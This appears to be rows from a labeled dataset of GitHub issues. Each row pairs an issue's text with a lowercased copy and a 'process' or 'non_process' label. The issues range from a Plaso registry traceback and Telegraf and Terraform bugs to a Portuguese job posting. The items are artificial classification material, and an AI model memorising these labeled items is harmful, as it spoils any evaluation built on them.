2020-02-06 09:52:07,742 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSLocalTime
2020-02-06 09:52:07,747 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSUserPasswordHashesPlistFiles
2020-02-06 09:52:07,755 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: WindowsEnvironmentVariableSystemRoot
2020-02-06 09:52:07,763 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: systemroot to: "\WINNT"
2020-02-06 09:52:07,769 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: WindowsEnvironmentVariableWinDir
2020-02-06 09:52:07,773 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: windir to: "\WINNT"
2020-02-06 09:52:07,778 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsEnvironmentVariableAllUsersProfile
2020-02-06 09:52:08,449 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: allusersprofile to: "All Users"
2020-02-06 09:52:08,451 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsAvailableTimeZones
2020-02-06 09:52:08,492 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsCodePage
2020-02-06 09:52:09,203 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsComputerName
root@7e56f81805b2:/tmp# log2timeline.py --version
plaso - log2timeline version 20200121
```
If it helps, `type(value_data)` at this point is `pyregf.multi_string`
Environment is the `log2timeline/plaso:20200121` docker image.
| process | preprocessing fails with windowshostnameplugin i got a image that fails to process with the following exception shell root tmp py d status view linear test plaso tmp image vmdk mainprocess pid determined data location usr share plaso mainprocess pid determined artifact definitions path usr share artifacts checking availability and versions of dependencies source path tmp image vmdk source type storage media image processing time processing started traceback most recent call last file usr bin py line in if not main file usr bin py line in main tool extracteventsfromsources file usr lib dist packages plaso cli tool py line in extracteventsfromsources self preprocesssources extraction engine file usr lib dist packages plaso cli extraction tool py line in preprocesssources resolver context self resolver context file usr lib dist packages plaso engine engine py line in preprocesssources self knowledge base file usr lib dist packages plaso preprocessors manager py line in runplugins artifacts registry knowledge base searcher file usr lib dist packages plaso preprocessors manager py line in collectfromwindowsregistry preprocess plugin collect knowledge base artifact definition searcher file usr lib dist packages plaso preprocessors interface py line in collect self parsekey knowledge base registry key value name file usr lib dist packages plaso preprocessors interface py line in parsekey self parsevaluedata knowledge base value object file usr lib dist packages plaso preprocessors windows py line in parsevaluedata type value data self artifact definition name typeerror unsupported format string passed to type format root tmp zcat log gz mainprocess pid starting preprocessing mainprocess pid running file system preprocessor plugin linuxhostnamefile mainprocess pid running file system preprocessor plugin linuxdistributionrelease mainprocess pid running file system preprocessor plugin linuxissuefile mainprocess pid running file system preprocessor plugin linuxlsbrelease mainprocess pid running file system preprocessor plugin linuxsystemdosrelease mainprocess pid running file system preprocessor plugin linuxlocaltime mainprocess pid running file system preprocessor plugin linuxpasswdfile mainprocess pid running file system preprocessor plugin macossystemconfigurationpreferencesplistfile mainprocess pid running file system preprocessor plugin macoskeyboardlayoutplistfile mainprocess pid running file system preprocessor plugin macossystemversionplistfile mainprocess pid running file system preprocessor plugin macoslocaltime mainprocess pid running file system preprocessor plugin macosuserpasswordhashesplistfiles mainprocess pid running file system preprocessor plugin windowsenvironmentvariablesystemroot mainprocess pid setting environment variable systemroot to winnt mainprocess pid running file system preprocessor plugin windowsenvironmentvariablewindir mainprocess pid setting environment variable windir to winnt mainprocess pid running windows registry preprocessor plugin windowsenvironmentvariableallusersprofile mainprocess pid setting environment variable allusersprofile to all users mainprocess pid running windows registry preprocessor plugin windowsavailabletimezones mainprocess pid running windows registry preprocessor plugin windowscodepage mainprocess pid running windows registry preprocessor plugin windowscomputername root tmp py version plaso version if it helps type value data at this point is pyregf multi string environment is the plaso docker image | 1 |
4,075 | 7,010,261,510 | IssuesEvent | 2017-12-19 22:26:11 | w3c/activitypub | https://api.github.com/repos/w3c/activitypub | opened | Illustration contrast | Editorial (would not change implementations) Needs Process Help | We received some feedback that the contrast on the images for the ActivityPub tutorial was too low. I'm hesitant about changing these far from @mray's original design; I think they were very intentional about their decisions in the original graphics so that the following properties were true:
- The colors helped convey contextual information that's useful in being able to read the images
- The color scheme, and level of contrast, leads the characters to be somewhat racially ambiguous, which I think is a win for diversity reasons; if we try to up the contrast too much, the characters will look white, and I think that would be a loss of another kind.
- mray also build their images based on my original ascii art; I originally designed those ascii art images in such a way that they are not *required* to understand the surrounding text, they mearly convey some additional useful information.
Nonetheless, I understand where the accessibilty concern comes from. In the latest Editor's Draft, I've adjusted the issues to both a) try to improve contrast and b) try to preserve mray's original design. This is the best I was able to do it... see here:
- [original](https://www.w3.org/TR/activitypub/illustration/tutorial-1.png)
- [adjusted](https://w3c.github.io/activitypub/illustration/tutorial-1.png)
If folks are fine with this, I'd be happy moving these to be the official images used, though I think we'd need process help to get the images changed at this point. | 1.0 | Illustration contrast - We received some feedback that the contrast on the images for the ActivityPub tutorial was too low. I'm hesitant about changing these far from @mray's original design; I think they were very intentional about their decisions in the original graphics so that the following properties were true:
- The colors helped convey contextual information that's useful in being able to read the images
- The color scheme, and level of contrast, leads the characters to be somewhat racially ambiguous, which I think is a win for diversity reasons; if we try to up the contrast too much, the characters will look white, and I think that would be a loss of another kind.
- mray also build their images based on my original ascii art; I originally designed those ascii art images in such a way that they are not *required* to understand the surrounding text, they mearly convey some additional useful information.
Nonetheless, I understand where the accessibilty concern comes from. In the latest Editor's Draft, I've adjusted the issues to both a) try to improve contrast and b) try to preserve mray's original design. This is the best I was able to do it... see here:
- [original](https://www.w3.org/TR/activitypub/illustration/tutorial-1.png)
- [adjusted](https://w3c.github.io/activitypub/illustration/tutorial-1.png)
If folks are fine with this, I'd be happy moving these to be the official images used, though I think we'd need process help to get the images changed at this point. | process | illustration contrast we received some feedback that the contrast on the images for the activitypub tutorial was too low i m hesitant about changing these far from mray s original design i think they were very intentional about their decisions in the original graphics so that the following properties were true the colors helped convey contextual information that s useful in being able to read the images the color scheme and level of contrast leads the characters to be somewhat racially ambiguous which i think is a win for diversity reasons if we try to up the contrast too much the characters will look white and i think that would be a loss of another kind mray also build their images based on my original ascii art i originally designed those ascii art images in such a way that they are not required to understand the surrounding text they mearly convey some additional useful information nonetheless i understand where the accessibilty concern comes from in the latest editor s draft i ve adjusted the issues to both a try to improve contrast and b try to preserve mray s original design this is the best i was able to do it see here if folks are fine with this i d be happy moving these to be the official images used though i think we d need process help to get the images changed at this point | 1 |
12,938 | 15,302,440,711 | IssuesEvent | 2021-02-24 14:44:45 | yuta252/startlens_ios_camera | https://api.github.com/repos/yuta252/startlens_ios_camera | closed | 認証機能の実装 | dev process | ## 概要
JWTトークンによる認証を利用してログイン画面を実装する
## 変更点
- ログイン画面の作成
- TextFieldEffects podsによる入力フォームの加工
- AlamofireによるバックエンドAPI処理
- 認証成功時にJWTトークンをUserDefaultsに保存する
## 参照
- [cocoaControles](https://www.cocoacontrols.com/)
- [テキスト入力時のエフェクトが美しいTextFieldEffects](https://dev.classmethod.jp/articles/swift_text_field_effects/) | 1.0 | 認証機能の実装 - ## 概要
JWTトークンによる認証を利用してログイン画面を実装する
## 変更点
- ログイン画面の作成
- TextFieldEffects podsによる入力フォームの加工
- AlamofireによるバックエンドAPI処理
- 認証成功時にJWTトークンをUserDefaultsに保存する
## 参照
- [cocoaControles](https://www.cocoacontrols.com/)
- [テキスト入力時のエフェクトが美しいTextFieldEffects](https://dev.classmethod.jp/articles/swift_text_field_effects/) | process | 認証機能の実装 概要 jwtトークンによる認証を利用してログイン画面を実装する 変更点 ログイン画面の作成 textfieldeffects podsによる入力フォームの加工 alamofireによるバックエンドapi処理 認証成功時にjwtトークンをuserdefaultsに保存する 参照 | 1 |
139,363 | 20,828,559,791 | IssuesEvent | 2022-03-19 03:21:51 | kubermatic/dashboard | https://api.github.com/repos/kubermatic/dashboard | closed | Update vSphere logo | kind/design sig/ui | I think vSphere logo was updated some time ago, see https://docs.vmware.com/.
~~I am not able to find any official page with resource though.~~ It requires login to access https://www.vmware.com/brand.html?ref=/brand/portal/guidelines/logo.html.
<img width="184" alt="Zrzut ekranu 2022-03-14 o 11 51 07" src="https://user-images.githubusercontent.com/2823399/158157830-35566561-1fe6-47ca-ae33-f4e89b4f9fbf.png">
| 1.0 | Update vSphere logo - I think vSphere logo was updated some time ago, see https://docs.vmware.com/.
~~I am not able to find any official page with resource though.~~ It requires login to access https://www.vmware.com/brand.html?ref=/brand/portal/guidelines/logo.html.
<img width="184" alt="Zrzut ekranu 2022-03-14 o 11 51 07" src="https://user-images.githubusercontent.com/2823399/158157830-35566561-1fe6-47ca-ae33-f4e89b4f9fbf.png">
| non_process | update vsphere logo i think vsphere logo was updated some time ago see i am not able to find any official page with resource though it requires login to access img width alt zrzut ekranu o src | 0 |
17,624 | 23,443,408,019 | IssuesEvent | 2022-08-15 17:04:44 | pytorch/pytorch | https://api.github.com/repos/pytorch/pytorch | closed | Multi-process Pipe() | module: multiprocessing triaged | ### 🚀 The feature, motivation and pitch
May I ask when the multi-process pipe will be released, and is there any test version that can be used? Thanks for any help and feedback.
### Alternatives
_No response_
### Additional context
_No response_
cc @VitalyFedyunin | 1.0 | Multi-process Pipe() - ### 🚀 The feature, motivation and pitch
May I ask when the multi-process pipe will be released, and is there any test version that can be used? Thanks for any help and feedback.
### Alternatives
_No response_
### Additional context
_No response_
cc @VitalyFedyunin | process | multi process pipe 🚀 the feature motivation and pitch may i ask when the multi process pipe will be released and is there any test version that can be used thanks for any help and feedback alternatives no response additional context no response cc vitalyfedyunin | 1 |
230,654 | 17,632,232,374 | IssuesEvent | 2021-08-19 09:24:31 | hashicorp/terraform-provider-azurerm | https://api.github.com/repos/hashicorp/terraform-provider-azurerm | closed | Documentation is not clear about azurerm provider definition for version 2.0.0 and features | enhancement question documentation | Hi, I spend few hours try to understand why a so simple code like the following was not working with the lastest azurerm provider :
```
variable "AzureRegion" {
type = string
}
variable "ResourceGroupName" {
type = string
}
# Azure Resource Group
resource "azurerm_resource_group" "Terra-RG-Stan1" {
name = var.ResourceGroupName
location = var.AzureRegion
}
```
If I run `terraform plan` and then type the values of AzureRegion and ResourceGroupName, I get the following error message : **Error: "features": required field is not set**
Fixing the azurerm provider to a 1.x version using the following code, solve the issue :
```
provider "azurerm" {
version = "=1.44.0"
}
```
Try to change with version 2.0.0 doesn't solve the issue :
```
provider "azurerm" {
version = "=2.0.0"
}
```
Adding feature{} to provider block, solve the issue:
```
provider "azurerm" {
version = "=2.0.0"
**features {}**
}
```
**So one thing to improve is probably to explain that now it s mandatory to define azurem provider block in terraform code** in beginning of documentation https://www.terraform.io/docs/providers/azurerm/index.html and insist about **required features {}** | 1.0 | Documentation is not clear about azurerm provider definition for version 2.0.0 and features - Hi, I spend few hours try to understand why a so simple code like the following was not working with the lastest azurerm provider :
```
variable "AzureRegion" {
type = string
}
variable "ResourceGroupName" {
type = string
}
# Azure Resource Group
resource "azurerm_resource_group" "Terra-RG-Stan1" {
name = var.ResourceGroupName
location = var.AzureRegion
}
```
If I run `terraform plan` and then type the values of AzureRegion and ResourceGroupName, I get the following error message : **Error: "features": required field is not set**
Fixing the azurerm provider to a 1.x version using the following code, solve the issue :
```
provider "azurerm" {
version = "=1.44.0"
}
```
Try to change with version 2.0.0 doesn't solve the issue :
```
provider "azurerm" {
version = "=2.0.0"
}
```
Adding feature{} to provider block, solve the issue:
```
provider "azurerm" {
version = "=2.0.0"
**features {}**
}
```
**So one thing to improve is probably to explain that now it s mandatory to define azurem provider block in terraform code** in beginning of documentation https://www.terraform.io/docs/providers/azurerm/index.html and insist about **required features {}** | non_process | documentation is not clear about azurerm provider definition for version and features hi i spend few hours try to understand why a so simple code like the following was not working with the lastest azurerm provider variable azureregion type string variable resourcegroupname type string azure resource group resource azurerm resource group terra rg name var resourcegroupname location var azureregion if i run terraform plan and then type the values of azureregion and resourcegroupname i get the following error message error features required field is not set fixing the azurerm provider to a x version using the following code solve the issue provider azurerm version try to change with version doesn t solve the issue provider azurerm version adding feature to provider block solve the issue provider azurerm version features so one thing to improve is probably to explain that now it s mandatory to define azurem provider block in terraform code in beginning of documentation and insist about required features | 0 |
14,976 | 18,496,739,115 | IssuesEvent | 2021-10-19 09:28:19 | influxdata/telegraf | https://api.github.com/repos/influxdata/telegraf | opened | Starlark pop not working as documented | bug area/starlark plugin/processor |
### Relevant telegraf.conf:
Use this as Starlark code:
```starlark
units = int(metric.tags.pop("units", "0"))
```
### System info:
Telegraf 1.20.2 (git: HEAD f721f53d)
### Steps to reproduce:
1. Use starlark processor with above code snippet
2. Send metric not having the `units` tag.
### Expected behavior:
No error and `units` should be `0`.
### Actual behavior:
> Error in pop: pop: key must be of type ‘str’
| 1.0 | Starlark pop not working as documented -
### Relevant telegraf.conf:
Use this as Starlark code:
```starlark
units = int(metric.tags.pop("units", "0"))
```
### System info:
Telegraf 1.20.2 (git: HEAD f721f53d)
### Steps to reproduce:
1. Use starlark processor with above code snippet
2. Send metric not having the `units` tag.
### Expected behavior:
No error and `units` should be `0`.
### Actual behavior:
> Error in pop: pop: key must be of type ‘str’
| process | starlark pop not working as documented relevant telegraf conf use this as starlark code starlark units int metric tags pop units system info telegraf git head steps to reproduce use starlark processor with above code snippet send metric not having the units tag expected behavior no error and units should be actual behavior error in pop pop key must be of type ‘str’ | 1 |
3,258 | 6,336,403,473 | IssuesEvent | 2017-07-26 21:00:59 | wpninjas/ninja-forms | https://api.github.com/repos/wpninjas/ninja-forms | closed | Update filter that Saves data to the Database | ADMIN: Submissions DIFFICULTY: Easy FRONT: Processing PRIORITY: High Security VALUE: Modern | Example: includes/Fields/CreditCardNumber.php line 27 | 1.0 | Update filter that Saves data to the Database - Example: includes/Fields/CreditCardNumber.php line 27 | process | update filter that saves data to the database example includes fields creditcardnumber php line | 1 |
21,398 | 29,202,233,016 | IssuesEvent | 2023-05-21 00:37:53 | devssa/onde-codar-em-salvador | https://api.github.com/repos/devssa/onde-codar-em-salvador | closed | [Remoto] React Native Developer (Pleno) na Coodesh | SALVADOR FRONT-END PJ PLENO REST TYPESCRIPT REACT MOBILE REQUISITOS IOS REMOTO GITHUB UMA C QUALIDADE APIs RESTFUL GEOPROCESSAMENTO MANUTENÇÃO NEGÓCIOS ARQUITETURA DE SISTEMAS COLETA DE DADOS SUPORTE DASHBOARD Stale | ## Descrição da vaga:
Esta é uma vaga de um parceiro da plataforma Coodesh, ao candidatar-se você terá acesso as informações completas sobre a empresa e benefícios.
Fique atento ao redirecionamento que vai te levar para uma url [https://coodesh.com](https://coodesh.com/vagas/react-native-developer-pleno-134354289?utm_source=github&utm_medium=devssa-onde-codar-em-salvador&modal=open) com o pop-up personalizado de candidatura. 👋
<p>A <strong>Geobyte</strong> está em busca de <strong><ins>React Native Developer</ins></strong> para compor seu time!</p>
<p><strong>Quem somos nós:</strong></p>
<p>Somos uma empresa de desenvolvimento de software, focada em soluções ambientais utilizando geoprocessamento. Nossos principais clientes são ONG’s e consultorias ambientais. Trabalhamos sempre em conjunto com nossos parceiros, estabelecendo uma comunicação transparente para entregar os melhores resultados, através de muito esforço e dedicação.</p>
<p><strong>Sobre a oportunidade </strong></p>
<p>O desenvolvedor Mobile deve trabalhar em conjunto com a equipe de desenvolvimento e com a equipe de negócios para aplicar soluções técnicas escaláveis, confiáveis e adequadas aos produtos. Para isso é necessário que o profissional tenha o conhecimento técnico, seja responsável e criativo.</p>
<p><strong>Responsabilidades:</strong></p>
<ul>
<li>Analisar o código existente em busca de falhas e problemas;</li>
<li>Documentar os métodos e o código com clareza e interagir regularmente com as equipes de gerenciamento e suporte técnico;</li>
<li>Construir e manter recursos para nossos aplicativos com programação React Native;</li>
<li>Fornecer software de alta qualidade, escalável e altamente testado; </li>
<li>Publicar os aplicativos nas lojas Androis e iOS;</li>
<li>Participar do processo criativo do produto, interagindo com pessoas de diferentes backgrounds, propondo e questionando;</li>
<li>Ter curiosidade intelectual, gostar de explorar novas tecnologias e melhorar a arquitetura de sistemas; </li>
<li>Responsabilidade por criar e organizar a estrutura de projeto de uma aplicação mobile completa; </li>
<li>Trabalhar em conjunto com um time multidisciplinar e focado em encontrar a melhor, mais estável e escalável tecnologia; </li>
<li>Auxiliar no desenvolvimento de soluções front-end modernas, escaláveis e de fácil manutenção.</li>
</ul>
## Geobyte:
<p>A Geobyte é uma empresa especializada em tecnologia, meio ambiente e Geoprocessamento que busca, por meio do seu conhecimento, agregar valor às soluções dos clientes. Além de dominar as tecnologias necessárias para desenvolver as soluções, possuímos amplo conhecimento em diversas áreas do meio ambiente e geoprocessamento, que auxilia seus clientes a encontrar as melhores alternativas para seu projeto. </p>
<p>Possuímos projetos elaborados em diversos segmentos relacionados ao meio ambiente, como análise de cobertura e uso do solo, análise e mapeamento social, criação de diversos sistemas webgis, aplicativo mobile para coleta de dados off-line em campo e posterior alimentação do sistema web, geração de relatórios e dashboard personalidades além de análises e filtros espaciais. Trabalhamos com empresas privadas, em consultorias ambientais, mineradores e outros. Setor público, com projetos nas secretarias de meio ambiente de Minas Gerais e Espírito Santo. Terceiro setor, em ONGs e Observatórios ambientais.</p><a href='https://coodesh.com/empresas/geobyte'>Veja mais no site</a>
## Habilidades:
- React Native
- Typescript
- REST APIs
## Local:
100% Remoto
## Requisitos:
- Conhecimento sobre React Native;
- Vivência com pelo menos um gerenciamento de estado;
- Familiaridade com TypeScript;
- Conhecimento em Watermelondb;
- Experiência no desenvolvimento de aplicações inteiras a partir do zero;
- Forte experiência com controle de versão;
- Experiência de desenvolvimento em React Native com TS;
- Conhecimento do ciclo de vida de uma plataforma;
- Consumo de API REST/RESTful.
## Como se candidatar:
Candidatar-se exclusivamente através da plataforma Coodesh no link a seguir: [React Native Developer (Pleno) na Geobyte](https://coodesh.com/vagas/react-native-developer-pleno-134354289?utm_source=github&utm_medium=devssa-onde-codar-em-salvador&modal=open)
Após candidatar-se via plataforma Coodesh e validar o seu login, você poderá acompanhar e receber todas as interações do processo por lá. Utilize a opção **Pedir Feedback** entre uma etapa e outra na vaga que se candidatou. Isso fará com que a pessoa **Recruiter** responsável pelo processo na empresa receba a notificação.
## Labels
#### Alocação
Remoto
#### Regime
PJ
#### Categoria
Mobile | 1.0 | [Remoto] React Native Developer (Pleno) na Coodesh - ## Descrição da vaga:
Esta é uma vaga de um parceiro da plataforma Coodesh, ao candidatar-se você terá acesso as informações completas sobre a empresa e benefícios.
Fique atento ao redirecionamento que vai te levar para uma url [https://coodesh.com](https://coodesh.com/vagas/react-native-developer-pleno-134354289?utm_source=github&utm_medium=devssa-onde-codar-em-salvador&modal=open) com o pop-up personalizado de candidatura. 👋
<p>A <strong>Geobyte</strong> está em busca de <strong><ins>React Native Developer</ins></strong> para compor seu time!</p>
<p><strong>Quem somos nós:</strong></p>
<p>Somos uma empresa de desenvolvimento de software, focada em soluções ambientais utilizando geoprocessamento. Nossos principais clientes são ONG’s e consultorias ambientais. Trabalhamos sempre em conjunto com nossos parceiros, estabelecendo uma comunicação transparente para entregar os melhores resultados, através de muito esforço e dedicação.</p>
<p><strong>Sobre a oportunidade </strong></p>
<p>O desenvolvedor Mobile deve trabalhar em conjunto com a equipe de desenvolvimento e com a equipe de negócios para aplicar soluções técnicas escaláveis, confiáveis e adequadas aos produtos. Para isso é necessário que o profissional tenha o conhecimento técnico, seja responsável e criativo.</p>
<p><strong>Responsabilidades:</strong></p>
<ul>
<li>Analisar o código existente em busca de falhas e problemas;</li>
<li>Documentar os métodos e o código com clareza e interagir regularmente com as equipes de gerenciamento e suporte técnico;</li>
<li>Construir e manter recursos para nossos aplicativos com programação React Native;</li>
<li>Fornecer software de alta qualidade, escalável e altamente testado; </li>
<li>Publicar os aplicativos nas lojas Androis e iOS;</li>
<li>Participar do processo criativo do produto, interagindo com pessoas de diferentes backgrounds, propondo e questionando;</li>
<li>Ter curiosidade intelectual, gostar de explorar novas tecnologias e melhorar a arquitetura de sistemas; </li>
<li>Responsabilidade por criar e organizar a estrutura de projeto de uma aplicação mobile completa; </li>
<li>Trabalhar em conjunto com um time multidisciplinar e focado em encontrar a melhor, mais estável e escalável tecnologia; </li>
<li>Auxiliar no desenvolvimento de soluções front-end modernas, escaláveis e de fácil manutenção.</li>
</ul>
## Geobyte:
<p>A Geobyte é uma empresa especializada em tecnologia, meio ambiente e Geoprocessamento que busca, por meio do seu conhecimento, agregar valor às soluções dos clientes. Além de dominar as tecnologias necessárias para desenvolver as soluções, possuímos amplo conhecimento em diversas áreas do meio ambiente e geoprocessamento, que auxilia seus clientes a encontrar as melhores alternativas para seu projeto. </p>
<p>Possuímos projetos elaborados em diversos segmentos relacionados ao meio ambiente, como análise de cobertura e uso do solo, análise e mapeamento social, criação de diversos sistemas webgis, aplicativo mobile para coleta de dados off-line em campo e posterior alimentação do sistema web, geração de relatórios e dashboard personalidades além de análises e filtros espaciais. Trabalhamos com empresas privadas, em consultorias ambientais, mineradores e outros. Setor público, com projetos nas secretarias de meio ambiente de Minas Gerais e Espírito Santo. Terceiro setor, em ONGs e Observatórios ambientais.</p><a href='https://coodesh.com/empresas/geobyte'>Veja mais no site</a>
## Habilidades:
- React Native
- Typescript
- REST APIs
## Local:
100% Remoto
## Requisitos:
- Conhecimento sobre React Native;
- Vivência com pelo menos um gerenciamento de estado;
- Familiaridade com TypeScript;
- Conhecimento em Watermelondb;
- Experiência no desenvolvimento de aplicações inteiras a partir do zero;
- Forte experiência com controle de versão;
- Experiência de desenvolvimento em React Native com TS;
- Conhecimento do ciclo de vida de uma plataforma;
- Consumo de API REST/RESTful.
## Como se candidatar:
Candidatar-se exclusivamente através da plataforma Coodesh no link a seguir: [React Native Developer (Pleno) na Geobyte](https://coodesh.com/vagas/react-native-developer-pleno-134354289?utm_source=github&utm_medium=devssa-onde-codar-em-salvador&modal=open)
Após candidatar-se via plataforma Coodesh e validar o seu login, você poderá acompanhar e receber todas as interações do processo por lá. Utilize a opção **Pedir Feedback** entre uma etapa e outra na vaga que se candidatou. Isso fará com que a pessoa **Recruiter** responsável pelo processo na empresa receba a notificação.
## Labels
#### Alocação
Remoto
#### Regime
PJ
#### Categoria
Mobile | process | react native developer pleno na coodesh descrição da vaga esta é uma vaga de um parceiro da plataforma coodesh ao candidatar se você terá acesso as informações completas sobre a empresa e benefícios fique atento ao redirecionamento que vai te levar para uma url com o pop up personalizado de candidatura 👋 a geobyte está em busca de react native developer para compor seu time quem somos nós somos uma empresa de desenvolvimento de software focada em soluções ambientais utilizando geoprocessamento nossos principais clientes são ong’s e consultorias ambientais trabalhamos sempre em conjunto com nossos parceiros estabelecendo uma comunicação transparente para entregar os melhores resultados através de muito esforço e dedicação sobre a oportunidade o desenvolvedor mobile deve trabalhar em conjunto com a equipe de desenvolvimento e com a equipe de negócios para aplicar soluções técnicas escaláveis confiáveis e adequadas aos produtos para isso é necessário que o profissional tenha o conhecimento técnico seja responsável e criativo responsabilidades analisar o código existente em busca de falhas e problemas documentar os métodos e o código com clareza e interagir regularmente com as equipes de gerenciamento e suporte técnico construir e manter recursos para nossos aplicativos com programação react native fornecer software de alta qualidade escalável e altamente testado nbsp publicar os aplicativos nas lojas androis e ios participar do processo criativo do produto interagindo com pessoas de diferentes backgrounds propondo e questionando ter curiosidade intelectual gostar de explorar novas tecnologias e melhorar a arquitetura de sistemas nbsp responsabilidade por criar e organizar a estrutura de projeto de uma aplicação mobile completa nbsp trabalhar em conjunto com um time multidisciplinar e focado em encontrar a melhor mais estável e escalável tecnologia nbsp auxiliar no desenvolvimento de soluções front end modernas escaláveis e de fácil manutenção geobyte a geobyte é uma empresa especializada em tecnologia meio ambiente e geoprocessamento que busca por meio do seu conhecimento agregar valor às soluções dos clientes além de dominar as tecnologias necessárias para desenvolver as soluções possuímos amplo conhecimento em diversas áreas do meio ambiente e geoprocessamento que auxilia seus clientes a encontrar as melhores alternativas para seu projeto nbsp possuímos projetos elaborados em diversos segmentos relacionados ao meio ambiente como análise de cobertura e uso do solo análise e mapeamento social criação de diversos sistemas webgis aplicativo mobile para coleta de dados off line em campo e posterior alimentação do sistema web geração de relatórios e dashboard personalidades além de análises e filtros espaciais trabalhamos com empresas privadas em consultorias ambientais mineradores e outros setor público com projetos nas secretarias de meio ambiente de minas gerais e espírito santo terceiro setor em ongs e observatórios ambientais habilidades react native typescript rest apis local remoto requisitos conhecimento sobre react native vivência com pelo menos um gerenciamento de estado familiaridade com typescript conhecimento em watermelondb experiência no desenvolvimento de aplicações inteiras a partir do zero forte experiência com controle de versão experiência de desenvolvimento em react native com ts conhecimento do ciclo de vida de uma plataforma consumo de api rest restful como se candidatar candidatar se exclusivamente através da plataforma coodesh no link a seguir após candidatar se via plataforma coodesh e validar o seu login você poderá acompanhar e receber todas as interações do processo por lá utilize a opção pedir feedback entre uma etapa e outra na vaga que se candidatou isso fará com que a pessoa recruiter responsável pelo processo na empresa receba a notificação labels alocação remoto regime pj categoria mobile | 1 |
28,162 | 8,101,634,032 | IssuesEvent | 2018-08-12 15:52:06 | SoftEtherVPN/SoftEtherVPN | https://api.github.com/repos/SoftEtherVPN/SoftEtherVPN | closed | clang static analyzer (scan-build) with cmake | build & release | please, someone have a look how scan-build can be called from within cmake
(I'm going to have a look by myself if I will have spare time) | 1.0 | clang static analyzer (scan-build) with cmake - please, someone have a look how scan-build can be called from within cmake
(I'm going to have a look by myself if I will have spare time) | non_process | clang static analyzer scan build with cmake please someone have a look how scan build can be called from within cmake i m going to have a look by myself if i will have spare time | 0 |
21,975 | 30,468,439,400 | IssuesEvent | 2023-07-17 12:06:53 | metabase/metabase | https://api.github.com/repos/metabase/metabase | closed | [MLv2] `:fields :all` should be added by default when creating a join | .Backend .metabase-lib .Team/QueryProcessor :hammer_and_wrench: | This is what MLv1 is doing, we should replicate that behavior by default so the frontend doesn't manually have to call
```ts
withFields(joinClause, "all")
```
every time it creates a join. I had this working in commit https://github.com/metabase/metabase/pull/32028/commits/498365ae462668b9a8c1479becc8d9cf7f9b1818 at one point but ultimately removed that from the PR since it was unrelated to what I was actually trying to fix -- hopefully that can serve as a reference
See also issue #32026 -- `:fields :all` breaks `replace-clause` | 1.0 | [MLv2] `:fields :all` should be added by default when creating a join - This is what MLv1 is doing, we should replicate that behavior by default so the frontend doesn't manually have to call
```ts
withFields(joinClause, "all")
```
every time it creates a join. I had this working in commit https://github.com/metabase/metabase/pull/32028/commits/498365ae462668b9a8c1479becc8d9cf7f9b1818 at one point but ultimately removed that from the PR since it was unrelated to what I was actually trying to fix -- hopefully that can serve as a reference
See also issue #32026 -- `:fields :all` breaks `replace-clause` | process | fields all should be added by default when creating a join this is what is doing we should replicate that behavior by default so the frontend doesn t manually have to call ts withfields joinclause all every time it creates a join i had this working in commit at one point but ultimately removed that from the pr since it was unrelated to what i was actually trying to fix hopefully that can serve as a reference see also issue fields all breaks replace clause | 1 |
18,630 | 24,580,308,018 | IssuesEvent | 2022-10-13 15:09:03 | GoogleCloudPlatform/fda-mystudies | https://api.github.com/repos/GoogleCloudPlatform/fda-mystudies | closed | [Android][Consent] Updated consent version is not available in the mobile | Bug Blocker P0 Android Process: Fixed Process: Tested QA Process: Tested dev | Steps:-
1. Login into the Android application[Gateway]
2. Enroll into the study
3. Navigate to Studies list screen
4. Update the consent and enable the **Enforce e-consent flow again for enrolled participants** in E-Consent steps and publish the updates
5. Open the study which is enrolled in the mobile and refresh
A/R:- Updated consent version is not displaying for the user, even though new version is available from SB
E/R:- Updated consent version is should be displayed for the user, whenever new version is available from SB | 3.0 | [Android][Consent] Updated consent version is not available in the mobile - Steps:-
1. Login into the Android application[Gateway]
2. Enroll into the study
3. Navigate to Studies list screen
4. Update the consent and enable the **Enforce e-consent flow again for enrolled participants** in E-Consent steps and publish the updates
5. Open the study which is enrolled in the mobile and refresh
A/R:- Updated consent version is not displaying for the user, even though new version is available from SB
E/R:- Updated consent version is should be displayed for the user, whenever new version is available from SB | process | updated consent version is not available in the mobile steps login into the android application enroll into the study navigate to studies list screen update the consent and enable the enforce e consent flow again for enrolled participants in e consent steps and publish the updates open the study which is enrolled in the mobile and refresh a r updated consent version is not displaying for the user even though new version is available from sb e r updated consent version is should be displayed for the user whenever new version is available from sb | 1 |
18,927 | 24,881,464,675 | IssuesEvent | 2022-10-28 01:46:45 | MicrosoftDocs/windows-dev-docs | https://api.github.com/repos/MicrosoftDocs/windows-dev-docs | closed | "Create and consume an app service" out of date? Undocumented "ExecutableOrStartPageIsRequired" setting. | uwp/prod processes-and-threading/tech Pri2 | I am trying to follow the tutorial [Create and consume an app service](https://learn.microsoft.com/en-us/windows/uwp/launch-resume/how-to-create-and-consume-an-app-service) but can't get the ClientApp to successfully connect to the app service after deploying the service (instead I get back the status "AppNotInstalled"). I've gone through the "General app service troubleshooting" steps about a dozen times and verified everything is correct, but still can't get the client to connect.
The tutorial has us manually add the app service declaration to the raw `Package.appxmanifest` XML. Afterward, the declaration is visible in the "Declarations" tab of the appxmanifest GUI Editor:

I notice there is a toggle field "ExecutableOrStartPageIsRequired" which is selected by default. We can deselect this, but the change isn't saved - if we close and re-open the manifest, the box will be selected again. In other words, this setting can't be turned off. Doing a web search for "ExecutableOrStartPageIsRequired" only returns a few hits; **it seems this setting isn't documented by Microsoft**.
Because the ExecutableOrStartPageIsRequired setting can't be turned off, it follows that we are required to fill in either the Executable field or Start Page field. However, these fields are not covered in the tutorial. Are we actually required to fill in the Executable or Start Page field? Is there a way to actually disable the "ExecutableOrStartPageIsRequired" option?
---
#### Document Details
⚠ *Do not edit this section. It is required for learn.microsoft.com ➟ GitHub issue linking.*
